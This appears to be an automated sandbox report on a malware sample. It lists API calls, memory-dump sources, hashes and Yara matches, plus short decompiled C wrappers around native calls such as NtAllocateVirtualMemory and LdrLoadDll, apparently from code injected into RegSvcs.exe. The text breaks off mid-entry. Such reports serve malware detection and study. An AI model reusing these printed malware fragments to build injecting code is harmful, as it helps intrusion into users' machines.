                                                      • Opcode ID: deff8ef3a5b28cb4e8c8db8a01f239fc2f6f1a348108c054eb4821d344828444
                                                      • Instruction ID: 8d9cd5da7cd0aaafac3e7e7267c776d8bed407303a98b44fe7bdc208e9985f5c
                                                      • Opcode Fuzzy Hash: deff8ef3a5b28cb4e8c8db8a01f239fc2f6f1a348108c054eb4821d344828444
                                                      • Instruction Fuzzy Hash: 9251CFB1D00319DFDB18CF99D984ADEBFB1BF48314F24812AE819AB210D7749986CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0112B3BC, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0112E02A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.241621865.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: b2cc7bc13ad076d1326db6fcf569fa4755a14a2881b9a26a73b36ab76b8c7875
                                                      • Instruction ID: 8b0c5d4016eca8c37991b3a53bf3ee772c59b6865924ad100511285e4a9e0822
                                                      • Opcode Fuzzy Hash: b2cc7bc13ad076d1326db6fcf569fa4755a14a2881b9a26a73b36ab76b8c7875
                                                      • Instruction Fuzzy Hash: CB51DFB1D00318DFDF18CFA9D984ADEBBB5BF48310F24812AE819AB210D7749946CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05002DFC, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 05003F81
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.243332681.0000000005000000.00000040.00000001.sdmp, Offset: 05000000, based on PE: false
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 8e8ffaff859363e494b1c9cb45804f946829164ed9a3144abda6d3a3fd2d4d9b
                                                      • Instruction ID: 7c97a1a8a7bd015de8b8686da41d45a12eb07d9f23906c5c76b4a0a74fb212f0
                                                      • Opcode Fuzzy Hash: 8e8ffaff859363e494b1c9cb45804f946829164ed9a3144abda6d3a3fd2d4d9b
                                                      • Instruction Fuzzy Hash: 2341D171C0461CCBEB24DFA9D848BDEBBF5BF98304F20846AD409AB251DB756949CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05000CD0, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 05000D91
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.243332681.0000000005000000.00000040.00000001.sdmp, Offset: 05000000, based on PE: false
                                                      Similarity
                                                      • API ID: CallProcWindow
                                                      • String ID:
                                                      • API String ID: 2714655100-0
                                                      • Opcode ID: 77d75e9e351cb8962a536dd297cc41e3f6516f2faf3603241e52be9ce499c347
                                                      • Instruction ID: f1a2257673fc2c0a0da51623f59450fb2688bbc233299647967956fa1d971e15
                                                      • Opcode Fuzzy Hash: 77d75e9e351cb8962a536dd297cc41e3f6516f2faf3603241e52be9ce499c347
                                                      • Instruction Fuzzy Hash: 8D4138B8A00605CFDB14CF89C488BAEBBF5FF88314F14845AD519AB361D734A846CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01126A2C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0112701E,?,?,?,?,?), ref: 011270DF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.241621865.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 91726aef1c987d443cb868069ca8e782170448643710318aca36a85bd2940323
                                                      • Instruction ID: 47eadf3e63e0ff7ca4111d6704fbfad41767e45da39f23abe5ad5aa89b14d9fc
                                                      • Opcode Fuzzy Hash: 91726aef1c987d443cb868069ca8e782170448643710318aca36a85bd2940323
                                                      • Instruction Fuzzy Hash: A72114B5900218AFDB14CFA9D984AEEBBF4FB48320F14801AE914B7350D778A954CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01127051, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0112701E,?,?,?,?,?), ref: 011270DF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.241621865.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: c69d333d80248eed50bbf9346dde5885bd11233457b75b6766ff69990264d5b4
                                                      • Instruction ID: 5989db2b6dbbb2cfccafa344d418fe59662181cccca26f8469bfe4a86f468bae
                                                      • Opcode Fuzzy Hash: c69d333d80248eed50bbf9346dde5885bd11233457b75b6766ff69990264d5b4
                                                      • Instruction Fuzzy Hash: 112112B5900209DFDB10CFA9D984AEEBBF4FB48320F14801AE915B7310C738AA54CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0112B280, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0112C129,00000800,00000000,00000000), ref: 0112C33A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.241621865.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 4e2c8d7d375f3f06e259155acafb622d25557fb24fb792c2fed6f5c4d33a4e82
                                                      • Instruction ID: 0ed38f0a9714000fc5fb1cdbacdbd602d9929eb80041c6cb16449c91cfd2aa23
                                                      • Opcode Fuzzy Hash: 4e2c8d7d375f3f06e259155acafb622d25557fb24fb792c2fed6f5c4d33a4e82
                                                      • Instruction Fuzzy Hash: 9C1114B29043098FDB14CF9AD444BDEFBF4EB88320F05842AEA19B7600C775A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0112C2CA, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0112C129,00000800,00000000,00000000), ref: 0112C33A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.241621865.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: f831180c54641d24f8b76582f80040f424695989fb8ac7563f0e0fe28f3ad5ac
                                                      • Instruction ID: 5ac7c9fbb3ee5cffab78bc1560f00fc79cb0c0a8dfde4b8d7f885eb73cf245f2
                                                      • Opcode Fuzzy Hash: f831180c54641d24f8b76582f80040f424695989fb8ac7563f0e0fe28f3ad5ac
                                                      • Instruction Fuzzy Hash: 2E1156B2D042098FDB14CF99D844BDEFBF4AF88314F04842AD515B7600C375A946CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0112B228, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0112BE7B), ref: 0112C0AE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.241621865.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 60c982fd1c03c72d85104da4c70124786b7eae175aa0162d7d8fd9552de05e3f
                                                      • Instruction ID: 571585665d3b8d24e28ec6676212e08aacdb6e355b8025b48d549f1114cc5d68
                                                      • Opcode Fuzzy Hash: 60c982fd1c03c72d85104da4c70124786b7eae175aa0162d7d8fd9552de05e3f
                                                      • Instruction Fuzzy Hash: EF1134B6C007488FDB24CF9AC444BDEFBF4EF48224F00841AD519A7200C379A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0112E158, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0112E148,?,?,?,?), ref: 0112E1BD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.241621865.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                      Similarity
                                                      • API ID: LongWindow
                                                      • String ID:
                                                      • API String ID: 1378638983-0
                                                      • Opcode ID: fbac12c33169def847289b66ecbcf4f36eb43d762130894dffda82e94d1b4492
                                                      • Instruction ID: 6d5b116bcb5a6b22c24714e2df0ddc0a1d0ff3fc0cbc56704945d15c98039be2
                                                      • Opcode Fuzzy Hash: fbac12c33169def847289b66ecbcf4f36eb43d762130894dffda82e94d1b4492
                                                      • Instruction Fuzzy Hash: 271115B5900208DFDB10CF99D584BDEBFF4EB48320F20842AD919A7740C374AA45CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0112B3F4, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0112E148,?,?,?,?), ref: 0112E1BD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.241621865.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                      Similarity
                                                      • API ID: LongWindow
                                                      • String ID:
                                                      • API String ID: 1378638983-0
                                                      • Opcode ID: c6e049acf421a502c5544cffdcfc97c38ef7dd8b74de6ff0fc8648540c77563c
                                                      • Instruction ID: 6a3742087149a43ed370a452e46a12e71121c68c63de863558482523782da585
                                                      • Opcode Fuzzy Hash: c6e049acf421a502c5544cffdcfc97c38ef7dd8b74de6ff0fc8648540c77563c
                                                      • Instruction Fuzzy Hash: 601103B59007199FDB14DF99D984BDFBBF8EB48320F20842AE919A7700C374A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 01129748, Relevance: .3, Instructions: 265COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.241621865.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8be4f80df8052bfe5e8ac8ff359350691236d75d1642d5e1f08ec36eaca782d3
                                                      • Instruction ID: 8c77b3da61e2c944521a2844718c6dd918b10de25ca26ece7baee61c34caef96
                                                      • Opcode Fuzzy Hash: 8be4f80df8052bfe5e8ac8ff359350691236d75d1642d5e1f08ec36eaca782d3
                                                      • Instruction Fuzzy Hash: 69A18132E0461A8FCF19CFA5C8445EDBBF2FF85304B15856AE905BB211EB31A965CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0112C7A8, Relevance: .2, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.241621865.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e54f97f5f5675d4457468f93929238d84c813fdc0babedd4fd57f9dede78141
                                                      • Instruction ID: 0ad49a5b13ef1888c2a6818f46b24718f58c787ccd14afdbc030a7ae64d8ff63
                                                      • Opcode Fuzzy Hash: 7e54f97f5f5675d4457468f93929238d84c813fdc0babedd4fd57f9dede78141
                                                      • Instruction Fuzzy Hash: BEC14FF9C997458BD310CFA5E8889A93BF1B764328FD24B0AD1612BAD0D7B4106ECF44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Analysis Process: RegSvcs.exe PID: 5984 Parent PID: 2764 RegSvcs.exeCOMMON

                                                      Executed Functions

                                                      Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 37%
                                                      			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                      0x00419e13
                                                      0x00419e1f
                                                      0x00419e27
                                                      0x00419e32
                                                      0x00419e4d
                                                      0x00419e55
                                                      0x00419e59

                                                      APIs
                                                      • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: BMA$BMA
                                                      • API String ID: 2738559852-2163208940
                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                      0x0040acec
                                                      0x0040acef
                                                      0x0040acf4
                                                      0x0040acf9
                                                      0x0040ad03
                                                      0x0040ad08
                                                      0x0040ad0b
                                                      0x0040ad0d
                                                      0x0040ad15
                                                      0x0040ad1a
                                                      0x0040ad1a
                                                      0x0040ad21
                                                      0x0040ad29
                                                      0x0040ad2c
                                                      0x0040ad2e
                                                      0x0040ad42
                                                      0x00000000
                                                      0x0040ad44
                                                      0x0040ad4a
                                                      0x0040acfe
                                                      0x0040acfe
                                                      0x0040acfe

                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                      • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                                      • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                      • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                      0x00419d6f
                                                      0x00419d77
                                                      0x00419dad
                                                      0x00419db1

                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                      0x00419f4f
                                                      0x00419f57
                                                      0x00419f79
                                                      0x00419f7d

                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00419E8A, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 84%
                                                      			E00419E8A(char __edx, intOrPtr _a4, void* _a8) {
				char _v117;
				long _t9;
				void* _t14;

				asm("rcl esi, 0x4d");
				_v117 = __edx;
				_t6 = _a4;
				_t3 = _t6 + 0x10; // 0x300
				_t4 = _t6 + 0xc50; // 0x40a923
				E0041A960(_t14, _a4, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}






                                                      0x00419e8a
                                                      0x00419e8f
                                                      0x00419e93
                                                      0x00419e96
                                                      0x00419e9f
                                                      0x00419ea7
                                                      0x00419eb5
                                                      0x00419eb9

                                                      APIs
                                                      • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: c1018387def85eeed92f59d50137b54cc45b6d41c7f080cf34bb8c5060453614
                                                      • Instruction ID: 6db9ccbf1bc62842b2b5d528f195f87351d07581d9f56d4640ef1b159193b464
                                                      • Opcode Fuzzy Hash: c1018387def85eeed92f59d50137b54cc45b6d41c7f080cf34bb8c5060453614
                                                      • Instruction Fuzzy Hash: 01E08CB6641214AFD720DBA8CC85EDB7B68EF553A0F194599F95DAB242C130A5008BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                      0x00419e93
                                                      0x00419e96
                                                      0x00419e9f
                                                      0x00419ea7
                                                      0x00419eb5
                                                      0x00419eb9

                                                      APIs
                                                      • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 09b6b0f304592c5f11b188468122b6cd5b47284eeaeb3e0e08d179f3b8e18f43
                                                      • Instruction ID: acbb9fd1ef4b2feb5469f94d5dcc3abdc1d4826219fe43a130accb77489a919c
                                                      • Opcode Fuzzy Hash: 09b6b0f304592c5f11b188468122b6cd5b47284eeaeb3e0e08d179f3b8e18f43
                                                      • Instruction Fuzzy Hash: 369002B120100412D140759948057470009A7D1341FD1C011A5064594ECA998DD57AA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016999A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 35ecfe6b66fad9bef808617e04aecc210b9dcf21dddeeebeba5ada6a3fa16f4e
                                                      • Instruction ID: b60fb5e3264ea3aadb3a7a8cc5ff31de4e8e13ce304f3eccc7616d1ee55d8b94
                                                      • Opcode Fuzzy Hash: 35ecfe6b66fad9bef808617e04aecc210b9dcf21dddeeebeba5ada6a3fa16f4e
                                                      • Instruction Fuzzy Hash: 299002A134100452D10065994815B070009E7E2341FD1C015E1064594DCA59CC527566
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d0743a4787c203376199df5c854c8f0ecdabda6093b03988292e8b52790fe7ee
                                                      • Instruction ID: 2c1f6ac74f8fa030325569747522980270c955a11c871bdf13c7663867fe5cc1
                                                      • Opcode Fuzzy Hash: d0743a4787c203376199df5c854c8f0ecdabda6093b03988292e8b52790fe7ee
                                                      • Instruction Fuzzy Hash: 0090027120100423D11165994905707000DA7D1281FD1C412A0424598DDA968D52B561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0efbe4ebaaeda59e65fdf69af6988b0d5c355155b9374f8f9dbd15b6b82fb15c
                                                      • Instruction ID: 09f8ecf9f7564a52486fc0f2c1e14e29d4e3269660fbf981bd89e3f0abf09e9b
                                                      • Opcode Fuzzy Hash: 0efbe4ebaaeda59e65fdf69af6988b0d5c355155b9374f8f9dbd15b6b82fb15c
                                                      • Instruction Fuzzy Hash: 70900261242041625545B5994805507400AB7E12817D1C012A1414990CC9669C56EA61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016998F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: bd14218b4054de5bc3eb9259f5f2b07d5b0a35a84a3899554b8253741a9d8252
                                                      • Instruction ID: 3a4008e8394dc0c32a93661bfb66905dbe6783a0e0ab6f1482a3bb5d7cc6de67
                                                      • Opcode Fuzzy Hash: bd14218b4054de5bc3eb9259f5f2b07d5b0a35a84a3899554b8253741a9d8252
                                                      • Instruction Fuzzy Hash: 8E90026160100512D10175994805617000EA7D1281FD1C022A1024595ECE658D92B571
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7d5057c9f80fc9b54fb794d9bde6f1cbd190073df5f7adbf51e7d1cf3f95bd5e
                                                      • Instruction ID: c98d170c7334b5fa25610a2e0e523522671ff00334729e28016e91d60c01916e
                                                      • Opcode Fuzzy Hash: 7d5057c9f80fc9b54fb794d9bde6f1cbd190073df5f7adbf51e7d1cf3f95bd5e
                                                      • Instruction Fuzzy Hash: 9A90026121180052D20069A94C15B070009A7D1343FD1C115A0154594CCD558C616961
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0b8723ce12dfbde2e3b0ccd94e5e0845fea0d7fd45c2d6b0f8eac143b621d2d7
